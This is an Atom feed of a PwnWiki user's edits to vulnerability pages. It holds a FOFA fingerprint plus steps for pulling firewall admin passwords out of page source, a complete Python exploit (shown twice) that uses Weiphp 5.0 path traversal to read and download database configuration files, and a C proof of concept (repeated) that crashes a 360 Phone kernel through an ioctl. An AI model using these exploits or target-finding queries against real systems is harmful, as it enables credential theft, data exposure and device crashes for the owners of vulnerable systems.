<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Wosk0x01</id>
	<title>PwnWiki - User contributions [Chinese]</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Wosk0x01"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Special:Contributions/Wosk0x01"/>
	<updated>2026-04-07T09:36:02Z</updated>
	<subtitle>User contributions</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=%E4%B8%AD%E7%A7%91%E7%B6%B2%E5%A8%81%E4%B8%8B%E4%B8%80%E4%BB%A3%E9%98%B2%E7%81%AB%E7%89%86%E6%8E%A7%E5%88%B6%E7%B3%BB%E7%B5%B1_%E8%B3%AC%E8%99%9F%E5%AF%86%E7%A2%BC%E6%B4%A9%E9%9C%B2%E6%BC%8F%E6%B4%9E&amp;diff=3801</id>
		<title>中科網威下一代防火牆控制系統 賬號密碼洩露漏洞</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=%E4%B8%AD%E7%A7%91%E7%B6%B2%E5%A8%81%E4%B8%8B%E4%B8%80%E4%BB%A3%E9%98%B2%E7%81%AB%E7%89%86%E6%8E%A7%E5%88%B6%E7%B3%BB%E7%B5%B1_%E8%B3%AC%E8%99%9F%E5%AF%86%E7%A2%BC%E6%B4%A9%E9%9C%B2%E6%BC%8F%E6%B4%9E&amp;diff=3801"/>
		<updated>2021-05-31T13:39:03Z</updated>

		<summary type="html">&lt;p&gt;Wosk0x01: /* 漏洞利用 */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==FOFA==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
body=&amp;quot;var dkey_verify = Get_Verify_Info(hex_md5)&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
⚠️️請注意：銳捷ISG、網域科技、中科網威等部分產品都存在該漏洞。&lt;br /&gt;
==漏洞利用==&lt;br /&gt;
查看網頁源代碼&amp;amp;解密MD5&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
可通過搜索 &amp;lt;nowiki&amp;gt;&amp;lt;code&amp;gt;var dkey_verify = Get_Verify_Info(hex_md5(user_string).toLowerCase(), user_passwd/*&amp;quot;密碼&amp;quot;*/); &amp;lt;/code&amp;gt;&amp;lt;/nowiki&amp;gt; 得到&lt;br /&gt;
&lt;br /&gt;
密碼字段在user_passwd字段内，不同平臺/版本可能有差異，歡迎進行補充&lt;/div&gt;</summary>
		<author><name>Wosk0x01</name></author>
	</entry>
	<entry>
		<id>https://pwnwiki.com/index.php?title=CNVD-2020-68596_Weiphp5.0_%E5%89%8D%E5%8F%B0%E6%96%87%E4%BB%B6%E4%BB%BB%E6%84%8F%E8%AE%80%E5%8F%96%E6%BC%8F%E6%B4%9E/en&amp;diff=3762</id>
		<title>CNVD-2020-68596 Weiphp5.0 前台文件任意讀取漏洞/en</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CNVD-2020-68596_Weiphp5.0_%E5%89%8D%E5%8F%B0%E6%96%87%E4%BB%B6%E4%BB%BB%E6%84%8F%E8%AE%80%E5%8F%96%E6%BC%8F%E6%B4%9E/en&amp;diff=3762"/>
		<updated>2021-05-31T03:57:54Z</updated>

		<summary type="html">&lt;p&gt;Wosk0x01: Created page with &amp;quot;==Reference==&amp;quot;&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;languages   /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Impact of the vulnerability==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Weiphp &amp;lt;= 5.0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==POC==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#!/usr/bin/python3&lt;br /&gt;
#-*- coding:utf-8 -*-&lt;br /&gt;
# author : PeiQi&lt;br /&gt;
# from   : http://wiki.peiqi.tech&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
import requests&lt;br /&gt;
import random&lt;br /&gt;
import re&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
def title():&lt;br /&gt;
    print('+------------------------------------------')&lt;br /&gt;
    print('+  \033[34mPOC_Des: http://wiki.peiqi.tech                                   \033[0m')&lt;br /&gt;
    print('+  \033[34mGithub : https://github.com/PeiQi0                                 \033[0m')&lt;br /&gt;
    print('+  \033[34m公众号 : PeiQi文库                                                \033[0m')                            \033[0m')&lt;br /&gt;
    print('+  \033[34mVersion: Weiphp5.0                                                \033[0m')&lt;br /&gt;
    print('+  \033[36m使用格式: python3 poc.py                                            \033[0m')&lt;br /&gt;
    print('+  \033[36mUrl    &amp;gt;&amp;gt;&amp;gt; http://xxx.xxx.xxx.xxx                                 \033[0m')&lt;br /&gt;
    print('+------------------------------------------')&lt;br /&gt;
&lt;br /&gt;
def POC_1(target_url):&lt;br /&gt;
    upload_url = target_url + &amp;quot;/public/index.php/material/Material/_download_imgage?media_id=1&amp;amp;picUrl=./../config/database.php&amp;quot;&lt;br /&gt;
    headers = {&lt;br /&gt;
        &amp;quot;User-Agent&amp;quot;: &amp;quot;Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36&amp;quot;&lt;br /&gt;
    }&lt;br /&gt;
    data = {&lt;br /&gt;
        &amp;quot;1&amp;quot;:1&lt;br /&gt;
    }&lt;br /&gt;
    try:&lt;br /&gt;
        response = requests.post(url=upload_url, headers=headers, data=data, timeout=20)&lt;br /&gt;
        if response.status_code == 200:&lt;br /&gt;
            print(&amp;quot;\033[32m[o] 成功将 database.php文件 写入Pictrue表中\033[0m&amp;quot;)&lt;br /&gt;
        else:&lt;br /&gt;
            print(&amp;quot;\033[31m[x] 漏洞利用失败 \033[0m&amp;quot;)&lt;br /&gt;
    except:&lt;br /&gt;
        print(&amp;quot;\033[31m[x] 漏洞利用失败 \033[0m&amp;quot;)&lt;br /&gt;
&lt;br /&gt;
def POC_2(target_url):&lt;br /&gt;
    vnln_url = target_url + &amp;quot;/public/index.php/home/file/user_pics&amp;quot;&lt;br /&gt;
    headers = {&lt;br /&gt;
        &amp;quot;User-Agent&amp;quot;: &amp;quot;Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36&amp;quot;&lt;br /&gt;
    }&lt;br /&gt;
    try:&lt;br /&gt;
        response = requests.get(url=vnln_url, headers=headers).text&lt;br /&gt;
        href = re.findall(r'&amp;lt;img src=&amp;quot;(.*?)&amp;quot;', response)&lt;br /&gt;
        for i in href:&lt;br /&gt;
            print(&amp;quot;\033[32m[o] 得到敏感文件url：{}\033[0m&amp;quot;.format(i))&lt;br /&gt;
            data = requests.get(url=i, headers=headers)&lt;br /&gt;
            path = str(random.randint(1,999)) + '.php'&lt;br /&gt;
            with open(path, 'wb') as f:&lt;br /&gt;
                f.write(data.content)&lt;br /&gt;
                print(&amp;quot;\033[32m[o] 成功下载文件为：{}\033[0m&amp;quot;.format(path))&lt;br /&gt;
                print(&amp;quot;\033[32m[o] 文件内容为：\n\033[0m{}&amp;quot;.format(data.text))&lt;br /&gt;
    except:&lt;br /&gt;
            print(&amp;quot;\033[31m[x] 获取文件名失败 \033[0m&amp;quot;)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
if __name__ == '__main__':&lt;br /&gt;
    title()&lt;br /&gt;
    target_url = str(input(&amp;quot;\033[35mPlease input Attack Url\nUrl &amp;gt;&amp;gt;&amp;gt; \033[0m&amp;quot;))&lt;br /&gt;
    POC_1(target_url)&lt;br /&gt;
    image_url = POC_2(target_url)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
==Reference==&lt;br /&gt;
http://wiki.peiqi.tech/PeiQi_Wiki/CMS%E6%BC%8F%E6%B4%9E/Weiphp/Weiphp5.0%20%E5%89%8D%E5%8F%B0%E6%96%87%E4%BB%B6%E4%BB%BB%E6%84%8F%E8%AF%BB%E5%8F%96%20CNVD-2020-68596.html&lt;/div&gt;</summary>
		<author><name>Wosk0x01</name></author>
	</entry>
	<entry>
		<id>https://pwnwiki.com/index.php?title=Translations:CNVD-2020-68596_Weiphp5.0_%E5%89%8D%E5%8F%B0%E6%96%87%E4%BB%B6%E4%BB%BB%E6%84%8F%E8%AE%80%E5%8F%96%E6%BC%8F%E6%B4%9E/2/en&amp;diff=3761</id>
		<title>Translations:CNVD-2020-68596 Weiphp5.0 前台文件任意讀取漏洞/2/en</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Translations:CNVD-2020-68596_Weiphp5.0_%E5%89%8D%E5%8F%B0%E6%96%87%E4%BB%B6%E4%BB%BB%E6%84%8F%E8%AE%80%E5%8F%96%E6%BC%8F%E6%B4%9E/2/en&amp;diff=3761"/>
		<updated>2021-05-31T03:57:46Z</updated>

		<summary type="html">&lt;p&gt;Wosk0x01: Created page with &amp;quot;==Reference==&amp;quot;&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==Reference==&lt;/div&gt;</summary>
		<author><name>Wosk0x01</name></author>
	</entry>
	<entry>
		<id>https://pwnwiki.com/index.php?title=Translations:CNVD-2020-68596_Weiphp5.0_%E5%89%8D%E5%8F%B0%E6%96%87%E4%BB%B6%E4%BB%BB%E6%84%8F%E8%AE%80%E5%8F%96%E6%BC%8F%E6%B4%9E/Page_display_title/en&amp;diff=3760</id>
		<title>Translations:CNVD-2020-68596 Weiphp5.0 前台文件任意讀取漏洞/Page display title/en</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Translations:CNVD-2020-68596_Weiphp5.0_%E5%89%8D%E5%8F%B0%E6%96%87%E4%BB%B6%E4%BB%BB%E6%84%8F%E8%AE%80%E5%8F%96%E6%BC%8F%E6%B4%9E/Page_display_title/en&amp;diff=3760"/>
		<updated>2021-05-31T03:57:33Z</updated>

		<summary type="html">&lt;p&gt;Wosk0x01: Created page with &amp;quot;CNVD-2020-68596 Weiphp5.0 foreground file arbitrary read vulnerability&amp;quot;&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;CNVD-2020-68596 Weiphp5.0 foreground file arbitrary read vulnerability&lt;/div&gt;</summary>
		<author><name>Wosk0x01</name></author>
	</entry>
	<entry>
		<id>https://pwnwiki.com/index.php?title=CNVD-2020-68596_Weiphp5.0_%E5%89%8D%E5%8F%B0%E6%96%87%E4%BB%B6%E4%BB%BB%E6%84%8F%E8%AE%80%E5%8F%96%E6%BC%8F%E6%B4%9E/en&amp;diff=3759</id>
		<title>CNVD-2020-68596 Weiphp5.0 前台文件任意讀取漏洞/en</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CNVD-2020-68596_Weiphp5.0_%E5%89%8D%E5%8F%B0%E6%96%87%E4%BB%B6%E4%BB%BB%E6%84%8F%E8%AE%80%E5%8F%96%E6%BC%8F%E6%B4%9E/en&amp;diff=3759"/>
		<updated>2021-05-31T03:57:31Z</updated>

		<summary type="html">&lt;p&gt;Wosk0x01: Created page with &amp;quot;==Impact of the vulnerability==&amp;quot;&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;languages   /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Impact of the vulnerability==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Weiphp &amp;lt;= 5.0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==POC==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#!/usr/bin/python3&lt;br /&gt;
#-*- coding:utf-8 -*-&lt;br /&gt;
# author : PeiQi&lt;br /&gt;
# from   : http://wiki.peiqi.tech&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
import requests&lt;br /&gt;
import random&lt;br /&gt;
import re&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
def title():&lt;br /&gt;
    print('+------------------------------------------')&lt;br /&gt;
    print('+  \033[34mPOC_Des: http://wiki.peiqi.tech                                   \033[0m')&lt;br /&gt;
    print('+  \033[34mGithub : https://github.com/PeiQi0                                 \033[0m')&lt;br /&gt;
    print('+  \033[34m公众号 : PeiQi文库                                                \033[0m')                            \033[0m')&lt;br /&gt;
    print('+  \033[34mVersion: Weiphp5.0                                                \033[0m')&lt;br /&gt;
    print('+  \033[36m使用格式: python3 poc.py                                            \033[0m')&lt;br /&gt;
    print('+  \033[36mUrl    &amp;gt;&amp;gt;&amp;gt; http://xxx.xxx.xxx.xxx                                 \033[0m')&lt;br /&gt;
    print('+------------------------------------------')&lt;br /&gt;
&lt;br /&gt;
def POC_1(target_url):&lt;br /&gt;
    upload_url = target_url + &amp;quot;/public/index.php/material/Material/_download_imgage?media_id=1&amp;amp;picUrl=./../config/database.php&amp;quot;&lt;br /&gt;
    headers = {&lt;br /&gt;
        &amp;quot;User-Agent&amp;quot;: &amp;quot;Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36&amp;quot;&lt;br /&gt;
    }&lt;br /&gt;
    data = {&lt;br /&gt;
        &amp;quot;1&amp;quot;:1&lt;br /&gt;
    }&lt;br /&gt;
    try:&lt;br /&gt;
        response = requests.post(url=upload_url, headers=headers, data=data, timeout=20)&lt;br /&gt;
        if response.status_code == 200:&lt;br /&gt;
            print(&amp;quot;\033[32m[o] 成功将 database.php文件 写入Pictrue表中\033[0m&amp;quot;)&lt;br /&gt;
        else:&lt;br /&gt;
            print(&amp;quot;\033[31m[x] 漏洞利用失败 \033[0m&amp;quot;)&lt;br /&gt;
    except:&lt;br /&gt;
        print(&amp;quot;\033[31m[x] 漏洞利用失败 \033[0m&amp;quot;)&lt;br /&gt;
&lt;br /&gt;
def POC_2(target_url):&lt;br /&gt;
    vnln_url = target_url + &amp;quot;/public/index.php/home/file/user_pics&amp;quot;&lt;br /&gt;
    headers = {&lt;br /&gt;
        &amp;quot;User-Agent&amp;quot;: &amp;quot;Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36&amp;quot;&lt;br /&gt;
    }&lt;br /&gt;
    try:&lt;br /&gt;
        response = requests.get(url=vnln_url, headers=headers).text&lt;br /&gt;
        href = re.findall(r'&amp;lt;img src=&amp;quot;(.*?)&amp;quot;', response)&lt;br /&gt;
        for i in href:&lt;br /&gt;
            print(&amp;quot;\033[32m[o] 得到敏感文件url：{}\033[0m&amp;quot;.format(i))&lt;br /&gt;
            data = requests.get(url=i, headers=headers)&lt;br /&gt;
            path = str(random.randint(1,999)) + '.php'&lt;br /&gt;
            with open(path, 'wb') as f:&lt;br /&gt;
                f.write(data.content)&lt;br /&gt;
                print(&amp;quot;\033[32m[o] 成功下载文件为：{}\033[0m&amp;quot;.format(path))&lt;br /&gt;
                print(&amp;quot;\033[32m[o] 文件内容为：\n\033[0m{}&amp;quot;.format(data.text))&lt;br /&gt;
    except:&lt;br /&gt;
            print(&amp;quot;\033[31m[x] 获取文件名失败 \033[0m&amp;quot;)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
if __name__ == '__main__':&lt;br /&gt;
    title()&lt;br /&gt;
    target_url = str(input(&amp;quot;\033[35mPlease input Attack Url\nUrl &amp;gt;&amp;gt;&amp;gt; \033[0m&amp;quot;))&lt;br /&gt;
    POC_1(target_url)&lt;br /&gt;
    image_url = POC_2(target_url)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;div lang=&amp;quot;chinese&amp;quot; dir=&amp;quot;ltr&amp;quot; class=&amp;quot;mw-content-ltr&amp;quot;&amp;gt;&lt;br /&gt;
==參考==&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
http://wiki.peiqi.tech/PeiQi_Wiki/CMS%E6%BC%8F%E6%B4%9E/Weiphp/Weiphp5.0%20%E5%89%8D%E5%8F%B0%E6%96%87%E4%BB%B6%E4%BB%BB%E6%84%8F%E8%AF%BB%E5%8F%96%20CNVD-2020-68596.html&lt;/div&gt;</summary>
		<author><name>Wosk0x01</name></author>
	</entry>
	<entry>
		<id>https://pwnwiki.com/index.php?title=Translations:CNVD-2020-68596_Weiphp5.0_%E5%89%8D%E5%8F%B0%E6%96%87%E4%BB%B6%E4%BB%BB%E6%84%8F%E8%AE%80%E5%8F%96%E6%BC%8F%E6%B4%9E/1/en&amp;diff=3758</id>
		<title>Translations:CNVD-2020-68596 Weiphp5.0 前台文件任意讀取漏洞/1/en</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Translations:CNVD-2020-68596_Weiphp5.0_%E5%89%8D%E5%8F%B0%E6%96%87%E4%BB%B6%E4%BB%BB%E6%84%8F%E8%AE%80%E5%8F%96%E6%BC%8F%E6%B4%9E/1/en&amp;diff=3758"/>
		<updated>2021-05-31T03:56:33Z</updated>

		<summary type="html">&lt;p&gt;Wosk0x01: Created page with &amp;quot;==Impact of the vulnerability==&amp;quot;&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==Impact of the vulnerability==&lt;/div&gt;</summary>
		<author><name>Wosk0x01</name></author>
	</entry>
	<entry>
		<id>https://pwnwiki.com/index.php?title=360_Phone_N6_Pro%E5%85%A7%E6%A0%B8%E6%BC%8F%E6%B4%9E/en&amp;diff=3750</id>
		<title>360 Phone N6 Pro內核漏洞/en</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=360_Phone_N6_Pro%E5%85%A7%E6%A0%B8%E6%BC%8F%E6%B4%9E/en&amp;diff=3750"/>
		<updated>2021-05-31T03:38:46Z</updated>

		<summary type="html">&lt;p&gt;Wosk0x01: Created page with &amp;quot;The kernel module in the 360 Phone N6 Pro V096 kernel component allows an attacker to use the command 3235427072 to inject variable on device &amp;lt;code&amp;gt;/dev/block/mmcblk0rpmb&amp;lt;/cod...&amp;quot;&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;languages   /&amp;gt;&lt;br /&gt;
==Principle of the vulnerability==&lt;br /&gt;
&lt;br /&gt;
The kernel module in the 360 Phone N6 Pro V096 kernel component allows an attacker to use the command 3235427072 to inject variable on device &amp;lt;code&amp;gt;/dev/block/mmcblk0rpmb&amp;lt;/code&amp;gt; and cause the kernel to crash.&lt;br /&gt;
&lt;br /&gt;
==Impact of the vulnerability==&lt;br /&gt;
&lt;br /&gt;
360 Phone N6 Pro 1801-A01&lt;br /&gt;
&lt;br /&gt;
==POC==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
/*&lt;br /&gt;
* This is poc of 360 N6 Pro, 1801-A01&lt;br /&gt;
* Android Version: 7.1.1&lt;br /&gt;
* Version Number: V096&lt;br /&gt;
* Kernel Version: Linux localhost 4.4.21-perf #1 SMP PREEMPT Wed Mar 28 15:24:20 UTC 2018 aarch64&lt;br /&gt;
* A NULL pointer bug in the ioctl interface of device file /dev/block/mmcblk0rpmb causes the system crash via IOCTL 3235427072.&lt;br /&gt;
* This Poc should run with permission to do ioctl on /dev/block/mmcblk0rpmb.&lt;br /&gt;
*/&lt;br /&gt;
#include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
#include &amp;lt;fcntl.h&amp;gt;&lt;br /&gt;
#include &amp;lt;errno.h&amp;gt;&lt;br /&gt;
#include &amp;lt;sys/ioctl.h&amp;gt;&lt;br /&gt;
&lt;br /&gt;
const static char *driver = &amp;quot;/dev/block/mmcblk0rpmb&amp;quot;;&lt;br /&gt;
static command = 3235427072; // 0xc0d8b300&lt;br /&gt;
&lt;br /&gt;
int main(int argc, char **argv, char **env) {&lt;br /&gt;
int fd = 0;&lt;br /&gt;
fd = open(driver, O_RDWR);&lt;br /&gt;
if (fd &amp;lt; 0) {&lt;br /&gt;
printf(&amp;quot;Failed to open %s, with errno %dn&amp;quot;, driver, errno);&lt;br /&gt;
system(&amp;quot;echo 1 &amp;gt; /data/local/tmp/log&amp;quot;);&lt;br /&gt;
return -1;&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
printf(&amp;quot;Try ioctl device file '%s', with command 0x%x and payload NULLn&amp;quot;, driver, command);&lt;br /&gt;
printf(&amp;quot;System will crash and reboot.n&amp;quot;);&lt;br /&gt;
if(ioctl(fd, command, NULL) &amp;lt; 0) {&lt;br /&gt;
printf(&amp;quot;Allocation of structs failed, %dn&amp;quot;, errno);&lt;br /&gt;
system(&amp;quot;echo 2 &amp;gt; /data/local/tmp/log&amp;quot;);&lt;br /&gt;
return -1;&lt;br /&gt;
}&lt;br /&gt;
close(fd);&lt;br /&gt;
return 0;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Wosk0x01</name></author>
	</entry>
	<entry>
		<id>https://pwnwiki.com/index.php?title=Translations:360_Phone_N6_Pro%E5%85%A7%E6%A0%B8%E6%BC%8F%E6%B4%9E/3/en&amp;diff=3749</id>
		<title>Translations:360 Phone N6 Pro內核漏洞/3/en</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Translations:360_Phone_N6_Pro%E5%85%A7%E6%A0%B8%E6%BC%8F%E6%B4%9E/3/en&amp;diff=3749"/>
		<updated>2021-05-31T03:31:08Z</updated>

		<summary type="html">&lt;p&gt;Wosk0x01: Created page with &amp;quot;==Impact of the vulnerability==&amp;quot;&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==Impact of the vulnerability==&lt;/div&gt;</summary>
		<author><name>Wosk0x01</name></author>
	</entry>
	<entry>
		<id>https://pwnwiki.com/index.php?title=Translations:360_Phone_N6_Pro%E5%85%A7%E6%A0%B8%E6%BC%8F%E6%B4%9E/2/en&amp;diff=3748</id>
		<title>Translations:360 Phone N6 Pro內核漏洞/2/en</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Translations:360_Phone_N6_Pro%E5%85%A7%E6%A0%B8%E6%BC%8F%E6%B4%9E/2/en&amp;diff=3748"/>
		<updated>2021-05-31T03:30:37Z</updated>

		<summary type="html">&lt;p&gt;Wosk0x01: Created page with &amp;quot;The kernel module in the 360 Phone N6 Pro V096 kernel component allows an attacker to use the command 3235427072 to inject variable on device &amp;lt;code&amp;gt;/dev/block/mmcblk0rpmb&amp;lt;/cod...&amp;quot;&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;The kernel module in the 360 Phone N6 Pro V096 kernel component allows an attacker to use the command 3235427072 to inject variable on device &amp;lt;code&amp;gt;/dev/block/mmcblk0rpmb&amp;lt;/code&amp;gt; and cause the kernel to crash.&lt;/div&gt;</summary>
		<author><name>Wosk0x01</name></author>
	</entry>
	<entry>
		<id>https://pwnwiki.com/index.php?title=360_Phone_N6_Pro%E5%85%A7%E6%A0%B8%E6%BC%8F%E6%B4%9E/en&amp;diff=3740</id>
		<title>360 Phone N6 Pro內核漏洞/en</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=360_Phone_N6_Pro%E5%85%A7%E6%A0%B8%E6%BC%8F%E6%B4%9E/en&amp;diff=3740"/>
		<updated>2021-05-31T03:22:45Z</updated>

		<summary type="html">&lt;p&gt;Wosk0x01: Created page with &amp;quot;==Principle of the vulnerability==&amp;quot;&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;languages   /&amp;gt;&lt;br /&gt;
==Principle of the vulnerability==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div lang=&amp;quot;chinese&amp;quot; dir=&amp;quot;ltr&amp;quot; class=&amp;quot;mw-content-ltr&amp;quot;&amp;gt;&lt;br /&gt;
360 Phone N6 Pro V096內核組件中的內核模塊允許攻擊者使用命令3235427072在設備&amp;lt;code&amp;gt;/dev/block/mmcblk0rpmb&amp;lt;/code&amp;gt;上通過ioctl的自變量注入精心設計的自變量，並導致內核崩潰。&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div lang=&amp;quot;chinese&amp;quot; dir=&amp;quot;ltr&amp;quot; class=&amp;quot;mw-content-ltr&amp;quot;&amp;gt;&lt;br /&gt;
==漏洞影響==&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
360 Phone N6 Pro 1801-A01&lt;br /&gt;
&lt;br /&gt;
==POC==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
/*&lt;br /&gt;
* This is poc of 360 N6 Pro, 1801-A01&lt;br /&gt;
* Android Version: 7.1.1&lt;br /&gt;
* Version Number: V096&lt;br /&gt;
* Kernel Version: Linux localhost 4.4.21-perf #1 SMP PREEMPT Wed Mar 28 15:24:20 UTC 2018 aarch64&lt;br /&gt;
* A NULL pointer bug in the ioctl interface of device file /dev/block/mmcblk0rpmb causes the system crash via IOCTL 3235427072.&lt;br /&gt;
* This Poc should run with permission to do ioctl on /dev/block/mmcblk0rpmb.&lt;br /&gt;
*/&lt;br /&gt;
#include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
#include &amp;lt;fcntl.h&amp;gt;&lt;br /&gt;
#include &amp;lt;errno.h&amp;gt;&lt;br /&gt;
#include &amp;lt;sys/ioctl.h&amp;gt;&lt;br /&gt;
&lt;br /&gt;
const static char *driver = &amp;quot;/dev/block/mmcblk0rpmb&amp;quot;;&lt;br /&gt;
static command = 3235427072; // 0xc0d8b300&lt;br /&gt;
&lt;br /&gt;
int main(int argc, char **argv, char **env) {&lt;br /&gt;
int fd = 0;&lt;br /&gt;
fd = open(driver, O_RDWR);&lt;br /&gt;
if (fd &amp;lt; 0) {&lt;br /&gt;
printf(&amp;quot;Failed to open %s, with errno %dn&amp;quot;, driver, errno);&lt;br /&gt;
system(&amp;quot;echo 1 &amp;gt; /data/local/tmp/log&amp;quot;);&lt;br /&gt;
return -1;&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
printf(&amp;quot;Try ioctl device file '%s', with command 0x%x and payload NULLn&amp;quot;, driver, command);&lt;br /&gt;
printf(&amp;quot;System will crash and reboot.n&amp;quot;);&lt;br /&gt;
if(ioctl(fd, command, NULL) &amp;lt; 0) {&lt;br /&gt;
printf(&amp;quot;Allocation of structs failed, %dn&amp;quot;, errno);&lt;br /&gt;
system(&amp;quot;echo 2 &amp;gt; /data/local/tmp/log&amp;quot;);&lt;br /&gt;
return -1;&lt;br /&gt;
}&lt;br /&gt;
close(fd);&lt;br /&gt;
return 0;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Wosk0x01</name></author>
	</entry>
	<entry>
		<id>https://pwnwiki.com/index.php?title=Translations:360_Phone_N6_Pro%E5%85%A7%E6%A0%B8%E6%BC%8F%E6%B4%9E/1/en&amp;diff=3739</id>
		<title>Translations:360 Phone N6 Pro內核漏洞/1/en</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Translations:360_Phone_N6_Pro%E5%85%A7%E6%A0%B8%E6%BC%8F%E6%B4%9E/1/en&amp;diff=3739"/>
		<updated>2021-05-31T03:21:48Z</updated>

		<summary type="html">&lt;p&gt;Wosk0x01: Created page with &amp;quot;==Principle of the vulnerability==&amp;quot;&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==Principle of the vulnerability==&lt;/div&gt;</summary>
		<author><name>Wosk0x01</name></author>
	</entry>
	<entry>
		<id>https://pwnwiki.com/index.php?title=360_Phone_N6_Pro%E5%85%A7%E6%A0%B8%E6%BC%8F%E6%B4%9E/en&amp;diff=3738</id>
		<title>360 Phone N6 Pro內核漏洞/en</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=360_Phone_N6_Pro%E5%85%A7%E6%A0%B8%E6%BC%8F%E6%B4%9E/en&amp;diff=3738"/>
		<updated>2021-05-31T03:21:35Z</updated>

		<summary type="html">&lt;p&gt;Wosk0x01: Created page with &amp;quot;360 Phone N6 Pro Kernel Vulnerability&amp;quot;&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;languages   /&amp;gt;&lt;br /&gt;
&amp;lt;div lang=&amp;quot;chinese&amp;quot; dir=&amp;quot;ltr&amp;quot; class=&amp;quot;mw-content-ltr&amp;quot;&amp;gt;&lt;br /&gt;
==漏洞原理==&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div lang=&amp;quot;chinese&amp;quot; dir=&amp;quot;ltr&amp;quot; class=&amp;quot;mw-content-ltr&amp;quot;&amp;gt;&lt;br /&gt;
360 Phone N6 Pro V096內核組件中的內核模塊允許攻擊者使用命令3235427072在設備&amp;lt;code&amp;gt;/dev/block/mmcblk0rpmb&amp;lt;/code&amp;gt;上通過ioctl的自變量注入精心設計的自變量，並導致內核崩潰。&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div lang=&amp;quot;chinese&amp;quot; dir=&amp;quot;ltr&amp;quot; class=&amp;quot;mw-content-ltr&amp;quot;&amp;gt;&lt;br /&gt;
==漏洞影響==&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
